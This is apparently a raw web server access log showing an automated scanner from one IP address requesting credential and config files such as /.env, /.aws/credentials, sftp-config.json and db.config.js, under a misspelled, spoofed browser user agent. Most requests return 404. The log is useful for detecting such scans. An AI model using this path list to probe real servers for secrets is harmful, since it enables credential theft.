23.239.16.64 - - [03/Aug/2022:08:36:57 +0200] "GET /?pp=env HTTP/1.1" 200 1229 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:08:36:57 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:08:36:57 +0200] "GET /config/env.js HTTP/1.1" 404 318 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:08:36:58 +0200] "GET /env.js HTTP/1.1" 404 311 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:08:36:58 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:08:36:58 +0200] "GET /config.js HTTP/1.1" 404 314 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:08:36:58 +0200] "GET /s3.js HTTP/1.1" 404 310 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:08:36:59 +0200] "GET /app/config/db.config.js HTTP/1.1" 404 328 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:08:36:59 +0200] "GET /phpinfo HTTP/1.1" 404 312 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:08:36:59 +0200] "GET /inpo.php HTTP/1.1" 404 313 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:08:36:59 +0200] "GET /sftp-config.json HTTP/1.1" 404 321 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:08:37:00 +0200] "GET /aws-config.json HTTP/1.1" 404 320 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
23.239.16.64 - - [03/Aug/2022:08:37:00 +0200] "GET /bitbucket-pipelines.yaml HTTP/1.1" 404 329 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
